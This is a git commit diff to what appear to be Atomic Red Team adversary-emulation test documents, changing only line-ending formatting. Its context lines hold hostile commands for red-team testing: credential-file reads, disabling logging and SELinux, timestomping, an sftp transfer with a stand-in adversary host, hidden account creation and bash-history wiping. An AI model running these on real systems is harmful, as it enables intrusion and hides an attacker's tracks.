how about one slash

2018-05-10 13:51:37 -06:00
parent 62e9fe559b
commit 31ccf34c84
14 changed files with 32 additions and 32 deletions
@@ -35,5 +35,5 @@ MITRE ATT&CK Technique: [<%= technique['identifier'] %>](https://attack.mitre.or
 ```
 <%- end -%>
 \
-\
+
 <%- end -%>
@@ -20,4 +20,4 @@ done

 ```
 \
-\
+
@@ -34,7 +34,7 @@ cat /etc/passwd > #{output_file}

 ```
 \
-\
+
 ## Atomic Test #2 - View sudoers access
 xxx (requires root)

@@ -52,7 +52,7 @@ cat /etc/sudoers > #{output_file}

 ```
 \
-\
+
 ## Atomic Test #3 - View accounts with UID 0
 xxx

@@ -70,7 +70,7 @@ grep 'x:0:' /etc/passwd > #{output_file}

 ```
 \
-\
+
 ## Atomic Test #4 - List opened files by user
 xxx

@@ -83,7 +83,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username

 ```
 \
-\
+
 ## Atomic Test #5 - Show if a user account has ever logger in remotely
 xxx

@@ -96,4 +96,4 @@ lastlog > #{output_file}

 ```
 \
-\
+
@@ -35,7 +35,7 @@ fi

 ```
 \
-\
+
 ## Atomic Test #2 - Disable syslog
 Disables syslog collection

@@ -55,7 +55,7 @@ fi

 ```
 \
-\
+
 ## Atomic Test #3 - Disable Cb Response
 Disable the Cb Response service

@@ -75,7 +75,7 @@ fi

 ```
 \
-\
+
 ## Atomic Test #4 - Disable SELinux
 Disables SELinux enforcement

@@ -88,4 +88,4 @@ setenforce 0

 ```
 \
-\
+
@@ -28,7 +28,7 @@ touch -a -t 197001010000.00 #{target_filename}

 ```
 \
-\
+
 ## Atomic Test #2 - Set a file's modification timestamp
 Stomps on the modification timestamp of a file

@@ -46,7 +46,7 @@ touch -m -t 197001010000.00 #{target_filename}

 ```
 \
-\
+
 ## Atomic Test #3 - Set a file's creation timestamp
 Stomps on the create timestamp of a file

@@ -71,4 +71,4 @@ stat #{target_filename}

 ```
 \
-\
+
@@ -49,4 +49,4 @@ sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file

 ```
 \
-\
+
@@ -26,7 +26,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}

 ```
 \
-\
+
 ## Atomic Test #2 - PowerShell Cmdlet via Windows command prompt
 [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)

@@ -39,4 +39,4 @@ powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet

 ```
 \
-\
+
@@ -26,4 +26,4 @@ fi

 ```
 \
-\
+
@@ -26,7 +26,7 @@ useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}

 ```
 \
-\
+
 ## Atomic Test #2 - Create a user account on a MacOS system
 Creates a user on a MacOS system with dscl

@@ -44,4 +44,4 @@ dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}

 ```
 \
-\
+
@@ -24,4 +24,4 @@ cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}

 ```
 \
-\
+
@@ -32,7 +32,7 @@ rm ~/.bash_history

 ```
 \
-\
+
 ## Atomic Test #2 - Clear Bash history (echo)
 Clears bash history via rm

@@ -45,7 +45,7 @@ echo "" > ~/.bash_history

 ```
 \
-\
+
 ## Atomic Test #3 - Clear Bash history (cat dev/null)
 Clears bash history via cat /dev/null

@@ -58,7 +58,7 @@ cat /dev/null > ~/.bash_history

 ```
 \
-\
+
 ## Atomic Test #4 - Clear Bash history (ln dev/null)
 Clears bash history via a symlink to /dev/null

@@ -71,7 +71,7 @@ ln -sf /dev/null ~/.bash_history

 ```
 \
-\
+
 ## Atomic Test #5 - Clear Bash history (truncate)
 Clears bash history via truncate

@@ -84,7 +84,7 @@ truncate -s0 ~/.bash_history

 ```
 \
-\
+
 ## Atomic Test #6 - Clear history of a bunch of shells
 Clears the history of a bunch of different shell types by setting the history size to zero

@@ -99,4 +99,4 @@ history -c

 ```
 \
-\
+
@@ -23,4 +23,4 @@ ls #{evil_command}

 ```
 \
-\
+
@@ -17,4 +17,4 @@ mkdir .hidden-directory
 echo "this file is hidden" > .hidden-directory/.hidden-file
 ```
 \
-\
+
@@ -28,7 +28,7 @@ tick 'Developer Mode'.


 \
-\
+
 ## Atomic Test #2 - Chrome (Chrome Web Store)
 xxx

@@ -43,7 +43,7 @@ in Chrome


 \
-\
+
 ## Atomic Test #3 - Firefox
 Create a file called test.wma, with the duration of 30 seconds

@@ -59,4 +59,4 @@ click "Load Temporary Add-on"
 3. Then click 'Open'

 \
-\
+